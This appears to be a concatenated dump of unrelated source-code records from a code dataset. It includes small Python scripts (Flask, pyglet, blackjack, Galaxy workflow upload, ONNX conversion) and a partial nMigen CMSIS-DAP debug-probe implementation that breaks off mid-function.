= 0\r\n duty_fan = 0\r\n my_pwm_relay.start(duty)\r\n my_pwm_fan.start(duty_fan)\r\n#============================================================================#\r\n def duty_change(error):\r\n # too cold\r\n if error > 2:\r\n duty = 100\r\n my_pwm_relay.ChangeDutyCycle(duty)\r\n elif 0 < error < 2:\r\n duty = 50 * error\r\n my_pwm_relay.ChangeDutyCycle(duty)\r\n \r\n # too hot\r\n elif error < 0 and error > -2:\r\n duty_fan = np.abs(50 * error)\r\n my_pwm_fan.ChangeDutyCycle(duty_fan)\r\n elif error < -2:\r\n duty_fan = 100\r\n my_pwm_fan.ChangeDutyCycle(duty_fan)\r\n#============================================================================#","sub_path":"uControllers/Temperature Control/All in one/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25471954","text":"#!bin/python\nimport sys, os, os.path, time, datetime, urllib.request, urllib.parse, urllib.error, glob, json, traceback\nfrom operator import itemgetter\nfrom collections import defaultdict, Counter\nimport configparser\nfrom io import StringIO\n\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nrequests.packages.urllib3.disable_warnings(InsecurePlatformWarning)\nrequests.packages.urllib3.disable_warnings(SNIMissingWarning)\n\nfrom optparse import OptionParser\nparser = OptionParser()\nparser.add_option(\"--galaxy\",dest=\"url\",help=\"Galaxy server URL\",default=None)\nparser.add_option(\"--apikey\",dest=\"apikey\",help=\"Galaxy API key\",default=None)\nparser.add_option(\"--cluster\",dest=\"cluster\",help=\"Galaxy cluster name\",default=None)\nparser.add_option(\"--directory\",dest=\"directory\",help=\"Workflows directory\",default=\"workflows\")\nopts,args = parser.parse_args()\n\nif not opts.url:\n\n assert os.path.exists('.galaxy.ini')\n config = configparser.SafeConfigParser()\n config.read(['.galaxy.ini'])\n\n if not opts.cluster or not config.has_section(opts.cluster):\n if opts.cluster and not config.has_section(opts.cluster):\n print(\"Cluster \\\"%s\\\" not found.\\n\"%(opts.cluster,), file=sys.stderr)\n print(\"Available clusters:\", file=sys.stderr)\n for sec in config.sections():\n if sec == 'GENERAL':\n continue\n print(\" \",sec, file=sys.stderr)\n sys.exit(1)\n\n url = config.get(opts.cluster,'URL') + '/galaxy/'\n apikey = config.get(opts.cluster,'APIKey')\n\nelse:\n\n assert(opts.apikey)\n\n url = opts.url\n apikey = opts.apikey\n\nfrom bioblend.galaxy import GalaxyInstance\nfrom bioblend.galaxy.dataset_collections import CollectionDescription, HistoryDatasetElement\nimport bioblend\ngi = GalaxyInstance(url=url,key=apikey)\ngi.verify=False\n\nwfname2id = defaultdict(set)\nfor wf in gi.workflows.get_workflows():\n wfname = wf['name']\n if ' (imported from ' in wfname:\n wfname = wfname.split(' (imported from ',1)[0]\n wfname2id[wfname].add(wf['id'])\n else:\n wfname2id[wfname].add(wf['id'])\n\nfor wffile in sorted(glob.glob(os.path.join(opts.directory,'*.ga'))):\n wf = json.loads(open(wffile).read())\n wfname = wf['name']\n if ' (imported from ' in wfname:\n wfname = wfname.split(' (imported from ',1)[0]\n if wfname in wfname2id:\n for wfid in wfname2id[wfname]:\n try:\n gi.workflows.delete_workflow(wfid)\n print(\"Delete workflow: %s\"%(wfname,))\n except:\n print(\"Delete workflow failed: %s\"%(wf['name'],))\n traceback.print_exc()\n try:\n wfi = gi.workflows.import_workflow_from_local_path(wffile)\n print(\"Imported workflow: %s\"%(wfi['name'],))\n except:\n print(\"Import workflow failed: %s\"%(wffile,))\n traceback.print_exc()\n","sub_path":"wfupload.py","file_name":"wfupload.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"303044338","text":"from typing import Any\n\nimport proto\n\nclass TargetingDimensionEnum(proto.Message):\n class TargetingDimension(proto.Enum):\n UNSPECIFIED = 0\n UNKNOWN = 1\n KEYWORD = 2\n AUDIENCE = 3\n TOPIC = 4\n GENDER = 5\n AGE_RANGE = 6\n PLACEMENT = 7\n PARENTAL_STATUS = 8\n INCOME_RANGE = 9\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n ) -> None: ...\n","sub_path":"google-stubs/ads/googleads/v14/enums/types/targeting_dimension.pyi","file_name":"targeting_dimension.pyi","file_ext":"pyi","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500223704","text":"import pyglet\n\nclass Box:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.lines = []#Lines this box is connected to\n self.update(x, y)\n\n def update(self, x, y):\n self.x = x\n self.y = y\n bottom = self.y-16\n left = self.x-16\n top = self.y+16\n right = self.x+16\n mtop = self.y+8\n mbottom = self.y-8\n mright = self.x+8\n oright = right+4\n self.batch = pyglet.graphics.Batch()\n self.g0 = pyglet.graphics.OrderedGroup(0)\n self.g1 = pyglet.graphics.OrderedGroup(1)\n self.square = self.batch.add_indexed(4, pyglet.gl.GL_TRIANGLES, self.g0, [0, 1, 2, 2, 0, 3],\n ('v2i', (left, bottom, right, bottom, right, top, left, top)),\n ('c3f', (1.0,)*12)\n )\n if self.app == True:\n self.s = self.batch.add_indexed(3, pyglet.gl.GL_TRIANGLES, self.g1, [0, 1, 2],\n ('v2i', (x, mbottom, mright, y, x, mtop)),\n ('c3f', (0.0,)*9)\n )\n else:\n self.s = self.batch.add_indexed(4, pyglet.gl.GL_TRIANGLES, self.g1, [0, 1, 2, 2, 0, 3],\n ('v2i', (right, mbottom, oright, mbottom, oright, mtop, right, mtop)),\n ('c3f', (1.0,)*12)\n )\n self.topattach = (x, top)\n self.leftattach = (left, y)\n self.rightattach = (right, y)\n self.bottomattach = (x, bottom)\n\n def hover(self, state=False):\n if state == True:\n self.square.colors = (1.0, 0.0, 0.0)*4\n else:\n self.square.colors = (1.0,)*12\n\nclass AbstractorBox(Box):\n\n def __init__(self, x, y):\n self.app = False\n Box.__init__(self, x, y)\n self.aline = None\n\n def update(self, x, y):\n Box.update(self, x, y)\n\n def hover(self, state=False):\n Box.hover(self, state)\n self.aline.hover(state)\n\n def draw(self):\n self.batch.draw()\n if self.aline:\n self.aline.draw()\n\n\nclass ApplicatorBox(Box):\n\n def __init__(self, x, y):\n self.app = True\n Box.__init__(self, x, y)\n self.inline = None\n self.outline = None\n\n def update(self, x, y):\n Box.update(self, x, y)\n\n def hover(self, state=False):\n Box.hover(self, state)\n self.inline.hover(state)\n self.outline.hover(state)\n\n def draw(self):\n self.batch.draw()\n if self.inline:\n self.inline.draw()\n if self.outline:\n self.outline.draw()\n\nclass Line:\n\n def __init__(self, start, end, endbox):\n self.sx, self.sy = start\n self.ex, self.ey = end\n self.endbox = endbox\n\n def draw(self):\n self.endbox.draw()\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n ('v2i', (self.sx, self.sy, self.ex, self.ey)),\n ('c3f', (1.0,)*6)\n )\n\n def hover(self, state=False):\n self.endbox.hover(state)\n\nwindow = pyglet.window.Window()\nb1 = AbstractorBox(50, 50)\nb2 = AbstractorBox(100, 150)\na1 = ApplicatorBox(200, 200)\nl1 = Line(b1.rightattach, b2.leftattach, b2)\nl2 = Line(b2.rightattach, a1.bottomattach, a1)\nl3 = Line(b1.topattach, a1.leftattach, a1)\nl4 = Line(b2.topattach, a1.rightattach, a1)\nb1.aline = l1\nb2.aline = l2\n\n@window.event\ndef on_draw():\n window.clear()\n b1.draw()\n l3.draw()\n l4.draw()\n\n#@window.event\n#def on_mouse_motion(x, y, dx, dy):\n# b1.update(x, y)\n\npyglet.app.run()\n","sub_path":"lambdabox.py","file_name":"lambdabox.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408462499","text":"# Author: Sam Youles\n# Modified by Julian Bautista\n# Moves only selected forests. Uses a Gaussian realisation of kappa c_ells.\n\nimport numpy as np\nimport healpy as hp\nimport sys\nimport glob\nimport os\nimport fitsio\nfrom kappa_lya import *\n\n#-- input directory name containing delta files\nindir = sys.argv[1]\noutdir = sys.argv[2]\n\n\n#-- Create angular power spectrum of kappa\ntheory = Theory()\nell, cell = theory.get_cl_kappa(2.1, kmax=100., nz=100, lmax=10000)\n\nnside=1024\nnpix=nside**2*12\nseed=1\nnp.random.seed(seed)\nkappa = create_gaussian_kappa(ell, cell, nside=nside, seed=seed)\nhp.fitsfunc.write_map('kappa_input.fits', kappa.A, fits_IDL=False)\n\n\n#-- Amend DEC and RA in each of the delta files by the bend angle from alpha map\nalldeltas = glob.glob(indir+'/*.fits.gz')\nsomedeltas = []\nfor i in alldeltas:\n if (i[-9:-8] == '0') or (int(i[-9:-8]) > 5):\n somedeltas.append(i)\nndel = len(somedeltas)\ni=0\nfor filename in somedeltas:\n #hdus = fits.open(filename)\n hdus = fitsio.FITS(filename)\n print(i, ndel)\n i+=1\n\n out = fitsio.FITS(outdir+\"/\"+os.path.basename(filename),'rw',clobber=True)\n\n for hdu in hdus[1:]:\n header = hdu.read_header()\n ra = header['RA']\n dec = header['DEC']\n\n # Add bend angles to ra and dec\n theta_lens, phi_lens = kappa.displace_objects(np.pi/2-dec, ra) \n \n # Rewrite new delta file with new values\n header['RA'] = phi_lens\n header['DEC'] = np.pi/2-theta_lens\n header['RA0'] = ra\n header['DEC0'] = dec\n \n #-- Re-create columns (maybe there's a better way to do this?) \n ll = hdu['LOGLAM'][:]\n de = hdu['DELTA'][:]\n we = hdu['WEIGHT'][:]\n co = hdu['CONT'][:] \n cols=[ll, de, we, co]\n names=['LOGLAM','DELTA','WEIGHT','CONT']\n out.write(cols, names=names, header=header, \\\n extname=str(header['THING_ID']))\n\n out.close()\n\n","sub_path":"bin/move_some_forests.py","file_name":"move_some_forests.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75776616","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/8 18:39\n# @Author : Zhang\n# @FileName: do_sum.py\n# @Software: PyCharm\n# @Blog :https://codedraw.cn\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/sum//')\ndef sum(a, b):\n sum = a + b\n return \"a + b = %d\" % sum\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=80)\n\n\n\n\n\n","sub_path":"PythonProject/week2/flask/do_sum.py","file_name":"do_sum.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418626920","text":"#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\n\nfrom ...common import NodeBuilder\nfrom ...common import utils\nfrom ...common import registration\n\n\nclass DotProductLayerConverter:\n\n @staticmethod\n def validate(cm_node):\n try:\n utils._check_has_attr(cm_node, 'dot')\n utils._check_has_attr(cm_node, 'input')\n utils._check_has_attr(cm_node, 'output')\n except AttributeError as e:\n raise RuntimeError('Missing attribute in neural network layer: {0}'.format(cm_node.name))\n\n @staticmethod\n def convert(context, cm_node, inputs, outputs):\n if cm_node.dot.cosineSimilarity:\n # To calculate cosine similarity, we first use LpNormalization to make the two input vectors unit-length.\n # Then, we calculate element-wise product of the two unit-length vectors. Finally, the similarity is the\n # sum of all the product's elements. Notice that we carefully specify the axis of the subsequent operators,\n # so they can work properly with a batch of vectors.\n\n # Normalize the first input and store the result on a temporal variable\n nb1 = NodeBuilder(context, 'LpNormalization')\n nb1.extend_input(inputs[0])\n nb1.add_attribute('p', 2)\n nb1.add_attribute('axis', 1)\n nb1.add_output(nb1.name)\n\n # Normalize the second input and store the result on a temporal variable\n nb2 = NodeBuilder(context, 'LpNormalization')\n nb2.extend_inputs(inputs[1])\n nb2.add_attribute('p', 2)\n nb2.add_attribute('axis', 1)\n nb2.add_output(nb2.name)\n\n # Do element-wise product of the two unit-length tensors\n nb3 = NodeBuilder(context, 'Mul')\n nb3.extend_inputs(nb1.output_names)\n nb3.extend_inputs(nb2.output_names)\n nb3.add_output(nb3.name)\n\n # Sum up results from different dimensions to get the final cosine similarity\n nb4 = NodeBuilder(context, 'ReduceSum')\n nb4.extend_inputs(nb3.output_names)\n nb4.extend_outputs(outputs)\n nb4.add_attribute('axes', [1])\n nb4.add_attribute('keepdims', False)\n\n return [nb.make_node() for nb in [nb1, nb2, nb3, nb4]]\n else:\n # This case is a simple dot product, which can be formed by a element-wise multiplication followed by\n # a reduction.\n\n # Calculate the element-wise product of inputs\n nb1 = NodeBuilder(context, 'Mul')\n nb1.extend_inputs(inputs)\n nb1.add_output(nb1.name)\n\n # Aggregate the product across all coordinates\n nb2 = NodeBuilder(context, 'ReduceSum')\n nb2.extend_inputs(nb1.output_names)\n nb2.extend_outputs(outputs)\n nb2.add_attribute('axes', [1])\n nb2.add_attribute('keepdims', False)\n\n return [nb.make_node() for nb in [nb1, nb2]]\n\n\nregistration.register_nn_converter('dot', DotProductLayerConverter)\n","sub_path":"onnxmltools/convert/coreml/NeuralNetwork/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405780186","text":"y =int(input(\"Enter number to find its cube root:\"))\nnumGuess=0\nx =y/2\nerror = 0.0000000001\n\nwhile abs(x**3 - y) > error:\n x = x - (x**3 - y)/(2*x**2)\n numGuess += 1\n print('Number of Guesses:'+str(numGuess), 'x:'+str(x))\nprint(\"The cube root of\",y,'is close to:',x)\n","sub_path":"cubeRootNewton_Raphson.py","file_name":"cubeRootNewton_Raphson.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424455866","text":"\"\"\" Classes and functions used in my project. \"\"\"\n\n# Classes:\n\nimport random\n\nclass DeckOfCards():\n \"\"\"\n Creates a deck of cards with which to play. \n For loop based on code found on StackExchange.\n \"\"\"\n\n # creates a deck of cards with 4 of each type\n deck = ['A' ,'K' ,'Q' , 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2'] * 4\n \n \n def shuffle(self, value):\n \"\"\"Picks a certain number of cards randomly from the deck.\n \n Parameters\n ----------\n value : int\n Number of cards to randomly choose.\n \n Returns\n -------\n cards : list\n List of the random cards.\n \"\"\"\n \n cards = []\n \n # choses a card randomly and puts it in the cards list\n # Citation: https://codereview.stackexchange.com/questions/194812/\n # a-simple-blackjack-game-implementation-in-python\n for num in range(value):\n \n max_num = len(self.deck) - 1\n picked = random.randint(0,max_num)\n cards.append(self.deck[picked])\n \n # takes out the chosen card from the deck\n self.deck.pop(picked)\n \n return cards\n \n\nclass Player():\n \"\"\"Creates a player with their own characteristics. \"\"\"\n \n def __init__(self, name):\n \"\"\"Gives each player a name, money, and a hand of cards, \n and keeps track of the money they bet.\n \n Parameters\n ----------\n name : str\n Input name of player. \n \"\"\"\n \n self.name = name\n self.money = 500\n self.hand = []\n self.bet = 0\n\n\nclass Dealer():\n \"\"\"Creates a dealer with a hand of cards against which players compete. \n Also keeps track of the total money lost by the players.\"\"\"\n \n def __init__(self):\n self.hand = []\n self.total_money = 0\n\n\n# Functions: \n\ndef player_names():\n \"\"\"Asks for each players' name, creates an instance of Player for each, \n and puts them in a list.\n \n Returns\n -------\n player_instances : list\n The list of all instances of players in the game.\n \n \"\"\"\n \n player_instances = []\n keep_asking = True\n \n # continues to request new players' names as long as there are more\n while keep_asking == True:\n \n # asks for the player's name\n name = input('What is this player\\'s name?: ')\n player_instances.append(Player(name))\n new_player = True\n \n # checks if there are more to be input\n while new_player == True:\n \n try:\n \n another = input('Is there another player?: ')\n \n # there is another player, so continues onto next player\n if another == 'Yes'or another == 'yes':\n\n keep_asking = True\n new_player = False\n \n # there are no more players, so ends loops\n elif another == 'No' or another == 'no':\n \n keep_asking = False\n new_player = False\n \n # unclear answer, so asks again\n else:\n \n raise Exception\n \n except Exception:\n \n print('Whoops! Please print yes or no.')\n \n return player_instances\n \n \ndef bet(list_of_names, dealer):\n \"\"\"\n Allows players to place bets.\n \n Parameters\n ----------\n list_of_names : list\n Previously defined player list from player_names function.\n dealer : instance of Dealer()\n An instance of the Dealer.\n \n \"\"\"\n \n # asks each player for inital bets\n for person in list_of_names:\n \n valid = True\n \n while valid:\n \n try:\n \n person.bet = input('Player {}, place your initial bet: '.format(person.name))\n # takes bet away from personal money total\n person.money -= int(person.bet)\n \n # continues to next player if player has enough money for their bet\n if person.money >= 0:\n \n valid = False\n \n # raises error if player bets more than they have\n elif person.money < 0:\n \n person.money = 500\n raise Exception\n \n # allows players to bet again if they tried to bet too much\n except Exception:\n \n print('Whoops! You only have 500 USD to start. Try again.')\n \n # gives all the money to the dealer\n dealer.total_money += int(person.bet)\n \n # shows money each player has\n print('\\nRemaining Balances: \\n')\n for person in list_of_names:\n \n print(person.name + ': ' + str(person.money) + ' USD')\n \n print('\\n' + '*****' * 15)\n \n \ndef cards_value(hand):\n \"\"\"\n Determines the numeric value of the current hand.\n \n Parameters\n ----------\n hand : list\n List of strings of cards player has.\n \n Returns\n -------\n total : int\n Sum of the values of each card in the hand.\n \n \"\"\"\n \n # assigns numeric value to each card face\n values_of_cards = {'A': 11, 'K': 10, 'Q': 10, 'J': 10, '10': 10, \n '9': 9, '8': 8, '7': 7, '6': 6, '5': 5, '4': 4, '3': 3, '2': 2}\n total = 0\n \n # sums values of all the cards in the hand\n for card in hand:\n \n this_value = values_of_cards[card]\n total += this_value\n \n # allows ace to have value 11 or 1\n if 'A' in hand and total > 21:\n total -= 10\n \n return total\n\n\ndef pun_machine(total):\n \"\"\"\n Assigns puns to the different totals a hand can have.\n \n Parameters\n ----------\n total : int\n The sum of the card values in a given hand.\n \n Returns\n -------\n chosen_pun : str\n The pun associated with the input total.\n \"\"\"\n \n # set of puns associated with most possible total values\n pun_dict = {4: 'Why didn\\'t the two 4\\'s feel like dinner? Because they already 8.',\n 5: 'I got into a fight with 1, 3, 5, 7 and 9. The odds were against me.', \n 6: 'Why is 6 afriad of 7? Because 7 8 9.',\n 7: 'How do you make 7 an even number? Take the s out!', \n 8: 'What did the 0 say to the 8? Nice belt.', \n 9: 'Why couldn\\'t the German count to 10? Because he was stuck on nein.',\n 10: 'Why is 10 afriad of 7? Because 7 8 9, and 10 is next.', \n 11: 'There was a murder. 2, 3, 5, 7 and 11 are the prime suspects.',\n 12: 'Why can\\'t a nose be 12 inches long? Because then it would be a foot.',\n 13: 'The number 13? Not on my watch.',\n 14: 'How does a blackjack dealer sneak about? He shuffles a round.', \n 15: 'How are 15 year old girls like their age? They can\\'t even.', \n 16: 'Why can\\'t you play blackjack in the wild? Because of all the cheetahs.', \n 17: 'To hit or not to hit, that is the question.', \n 18: '18 & 20 were playing a game of blackjack. Twenty one.', \n 19: '19 & 20 were playing a game of blackjack. Twenty one.',\n 20: 'Why is 9 afraid of 20? Because twenty eight twenty nine\\'s.',\n 21: 'BLACKJACK!!', \n 22: 'Why did all the numbers laugh at 22 ? Because it had tu tu’s'}\n \n # chooses pun based on total value of hand\n chosen_pun = pun_dict[total]\n return chosen_pun\n","sub_path":"my_module/classes_and_functions.py","file_name":"classes_and_functions.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517113326","text":"from nmigen import *\nfrom .dbgIF import DBGIF\n\n# Principle of operation\n# ======================\n#\n# This module takes frames from the stream handler, parses them and sends them to the dbgif below for\n# processing. In general this layer avoids doing any manipulation of the line, that is all handled\n# below, with the intention of being able to replace cmsis-dap with another dap controller if\n# needed.\n#\n# Communication with the dbgif is via a register and flag mechanism. Registers are filled with the\n# appropriate information, then 'go' is set. When the dbgif accepts the command it drops 'done'\n# and this layer can then release 'go'. When the command finishes 'done' is set true again.\n#\n# Default configuration information\n# =================================\n\nDAP_CONNECT_DEFAULT = 1 # Default connect is SWD\nDAP_VERSION_STRING = Cat(C(0x31,8),C(0x2e,8),C(0x30,8),C(0x30,8),C(0,8))\nDAP_CAPABILITIES = 0x03 # JTAG and SWD Debug\nDAP_TD_TIMER_FREQ = 0x3B9ACA00 # 1uS resolution timer\nDAP_MAX_PACKET_COUNT = 1 # 1 max packet count\nDAP_V1_MAX_PACKET_SIZE = 64\nDAP_V2_MAX_PACKET_SIZE = 511\nMAX_MSG_LEN = DAP_V2_MAX_PACKET_SIZE\n\n# CMSIS-DAP Protocol Messages\n# ===========================\n\nDAP_Info = 0x00\nDAP_HostStatus = 0x01\nDAP_Connect = 0x02\nDAP_Disconnect = 0x03\nDAP_TransferConfigure = 0x04\nDAP_Transfer = 0x05\nDAP_TransferBlock = 0x06\nDAP_TransferAbort = 0x07\nDAP_WriteABORT = 0x08\nDAP_Delay = 0x09\nDAP_ResetTarget = 0x0a\nDAP_SWJ_Pins = 0x10\nDAP_SWJ_Clock = 0x11\nDAP_SWJ_Sequence = 0x12\nDAP_SWD_Configure = 0x13\nDAP_JTAG_Sequence = 0x14\nDAP_JTAG_Configure = 0x15\nDAP_JTAG_IDCODE = 0x16\nDAP_SWO_Transport = 0x17\nDAP_SWO_Mode = 0x18\nDAP_SWO_Baudrate = 0x19\nDAP_SWO_Control = 0x1a\nDAP_SWO_Status = 0x1b\nDAP_SWO_Data = 0x1c\nDAP_SWD_Sequence = 0x1d\nDAP_SWO_ExtendedStatus = 0x1e\nDAP_ExecuteCommands = 0x7f\n\nDAP_QueueCommands = 0x7e\nDAP_Invalid = 0xff\n\n# Commands to the dbgIF\n# =====================\n\nCMD_RESET = 0\nCMD_PINS_WRITE = 1\nCMD_TRANSACT = 2\nCMD_SET_SWD = 3\nCMD_SET_JTAG = 4\nCMD_SET_SWJ = 5\nCMD_SET_JTAG_CFG = 6\nCMD_SET_CLK = 7\nCMD_SET_SWD_CFG = 8\nCMD_WAIT = 9\nCMD_CLR_ERR = 10\nCMD_SET_RST_TMR = 11\nCMD_SET_TFR_CFG = 12\nCMD_JTAG_GET_ID = 13\nCMD_JTAG_RESET = 14\n\n# TODO/Done\n# =========\n\n# DAP_Info : Done\n# DAP_Hoststatus : Done (But not tied to h/w)\n# DAP_Connect : Done + Tested for SWD, Not for JTAG\n# DAP_Disconnect : Done\n# DAP_WriteABORT : Done\n# DAP_Delay : Done\n# DAP_ResetTarget : Done\n# DAP_SWJ_Pins : Done\n# DAP_SWJ_Clock : Done\n# DAP_SWJ_Sequence : Done\n# DAP_SWD_Configure : Done\n# DAP_SWD_Sequence :\n# DAP_SWO_Transport : Not implemented\n# DAP_SWO_Mode : Not implemented\n# DAP_SWO_Baudrate : Not implemented\n# DAP_SWO_Control : Not implemented\n# DAP_SWO_Status : Not implemented\n# DAP_SWO_ExtendedStatus : Not implemented\n# DAP_SWO_Data : Not implemented\n# DAP_JTAG_Sequence :\n# DAP_JTAG_Configure :\n# DAP_JTAG_IDCODE :\n# DAP_Transfer_Configure : Done\n# DAP_Transfer : Done (Masking done, not tested)\n# DAP_TransferBlock : Done\n# DAP_TransferAbort : Done\n# DAP_ExecuteCommands :\n# DAP_QueueCommands :\n\n# This is the RAM used to store responses before they are sent back to the host\n# =============================================================================\n\nclass WideRam(Elaboratable):\n def __init__(self):\n self.adr = Signal(range((MAX_MSG_LEN//4)))\n self.dat_r = Signal(32)\n self.dat_w = Signal(32)\n self.we = Signal()\n self.mem = Memory(width=32, depth=MAX_MSG_LEN//4)\n\n def elaborate(self, platform):\n m = Module()\n m.submodules.rdport = rdport = self.mem.read_port()\n m.submodules.wrport = wrport = self.mem.write_port()\n m.d.comb += [\n rdport.addr.eq(self.adr),\n wrport.addr.eq(self.adr),\n self.dat_r.eq(rdport.data),\n wrport.data.eq(self.dat_w),\n wrport.en.eq(self.we),\n ]\n return m\n\n# This is the CMSIS-DAP handler itself\n# ====================================\n\nclass CMSIS_DAP(Elaboratable):\n def __init__(self, streamIn, streamOut, dbgpins, v2Indication):\n # Canary\n self.can = Signal()\n\n # External interface\n self.running = Signal() # Flag for if target is running\n self.connected = Signal() # Flag for if target is connected\n\n self.isV2 = v2Indication\n self.streamIn = streamIn\n self.streamOut = streamOut\n self.rxBlock = Signal( 7*8 ) # Longest message we pickup is 6 bytes + command\n self.rxLen = Signal(3) # Rxlen to pick up\n self.rxedLen = Signal(3) # Rxlen picked up so far\n self.swjbits = Signal(8) # Number of bits of SWJ remaining outstanding\n\n self.txBlock = Signal( 14*8 ) # Response to be returned\n self.txLen = Signal(range(MAX_MSG_LEN)) # Length of response to be returned\n self.txedLen = Signal(range(MAX_MSG_LEN)) # Length of response that has been returned so far\n self.busy = Signal() # Indicator that we can't receive stream traffic at the moment\n\n self.txb = Signal(5) # State of various orthogonal state machines\n\n # Support for SWJ_Sequence\n self.bitcount = Signal(3) # Bitcount in transmission sequence\n\n # Support for JTAG_Sequence\n self.tmsValue = Signal() # TMS value while performing JTAG sequence\n self.tdoCapture = Signal() # Are we capturing TDO when performing JTAG sequence\n self.tdiData = Signal(8) # TDI being sent out\n self.tdoCount = Signal(4) # Count of tdi bits being sent\n self.tdiCount = Signal(4) # Count of tdi bits being received\n self.seqCount = Signal(8) # Number of sequences that follow\n self.tckCycles = Signal(6) # Number of tckCycles in this sequence\n self.tdotgt = Signal(7) # Number of tdo cycles to collect (note the extra bit)\n self.pendingTx = Signal(8) # Next octet to be sent out of streamIn\n self.tdoBuild = Signal(8) # Return value being built\n\n # Support for DAP_Transfer\n self.dapIndex = Signal(8) # Index of selected JTAG device\n self.transferCount= Signal(16) # Number of transfers 1..65535\n\n self.mask = Signal(32) # Match mask register\n\n self.retries = Signal(16) # Retry counter for WAIT\n self.matchretries = Signal(16) # Retry counter for Value Matching\n\n self.tfrReq = Signal(8) # Transfer request from controller\n self.tfrData = Signal(32) # Transfer data from controller\n\n # CMSIS-DAP Configuration info\n self.ndev = Signal(8) # Number of devices in signal chain\n self.irlength = Signal(8) # JTAG IR register length for each device\n\n self.waitRetry = Signal(16) # Number of transfer retries after WAIT response\n self.matchRetry = Signal(16) # Number of retries on reads with Value Match in DAP_Transfer\n\n self.dbgpins = dbgpins\n # -------------------------------------------------------------------------------------\n def RESP_Invalid(self, m):\n # Simply transmit an 'invalid' packet back\n m.d.sync += [ self.txBlock.word_select(0,8).eq(C(DAP_Invalid,8)), self.txLen.eq(1), self.busy.eq(1) ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_Info(self, m):\n # \n # Transmit requested information packet back\n m.next = 'RESPOND'\n\n with m.Switch(self.rxBlock.word_select(1,8)):\n # These cases are not implemented in this firmware\n # Get the Vendor ID, Product ID, Serial Number, Target Device Vendor, Target Device Name\n with m.Case(0x01, 0x02, 0x03, 0x05, 0x06):\n m.d.sync += [ self.txLen.eq(2), self.txBlock[8:16].eq(Cat(C(0,8))) ]\n with m.Case(0x04): # Get the CMSIS-DAP Firmware Version (string)\n m.d.sync += [ self.txLen.eq(7), self.txBlock[8:56].eq(Cat(C(5,8),DAP_VERSION_STRING))]\n with m.Case(0xF0): # Get information about the Capabilities (BYTE) of the Debug Unit\n m.d.sync+=[self.txLen.eq(3), self.txBlock[8:24].eq(Cat(C(1,8),C(DAP_CAPABILITIES,8)))]\n with m.Case(0xF1): # Get the Test Domain Timer parameter information\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:56].eq(Cat(C(8,8),C(DAP_TD_TIMER_FREQ,32)))]\n with m.Case(0xFD): # Get the SWO Trace Buffer Size (WORD)\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:48].eq(Cat(C(4,8),C(0,32)))]\n with m.Case(0xFE): # Get the maximum Packet Count (BYTE)\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:24].eq(Cat(C(1,8),C(DAP_MAX_PACKET_COUNT,8)))]\n with m.Case(0xFF): # Get the maximum Packet Size (SHORT).\n with m.If(self.isV2):\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:32].eq(Cat(C(2,8),C(DAP_V2_MAX_PACKET_SIZE,16)))]\n with m.Else():\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:32].eq(Cat(C(2,8),C(DAP_V1_MAX_PACKET_SIZE,16)))]\n with m.Default():\n self.RESP_Invalid(m)\n # -------------------------------------------------------------------------------------\n def RESP_Not_Implemented(self, m):\n m.d.sync += self.txBlock.word_select(1,8).eq(C(0xff,8))\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_HostStatus(self, m):\n # \n # Set LEDs for condition of debugger\n m.next = 'RESPOND'\n\n with m.Switch(self.rxBlock.word_select(1,8)):\n with m.Case(0x00): # Connect LED\n m.d.sync+=self.connected.eq(self.rxBlock.word_select(2,8)==C(1,8))\n with m.Case(0x01): # Running LED\n m.d.sync+=self.running.eq(self.rxBlock.word_select(2,8)==C(1,8))\n with m.Default():\n self.RESP_Invalid(m)\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Connect_Setup(self, m):\n # \n # Perform connect operation\n self.RESP_Invalid(m)\n\n if (DAP_CAPABILITIES&(1<<0)):\n # SWD mode is permitted\n with m.If ((((self.rxBlock.word_select(1,8))==0) & (DAP_CONNECT_DEFAULT==1)) |\n ((self.rxBlock.word_select(1,8))==1)):\n m.d.sync += [\n self.txBlock.word_select(0,16).eq(Cat(self.rxBlock.word_select(0,8),C(1,8))),\n self.dbgif.command.eq(CMD_SET_SWD),\n self.txLen.eq(2),\n 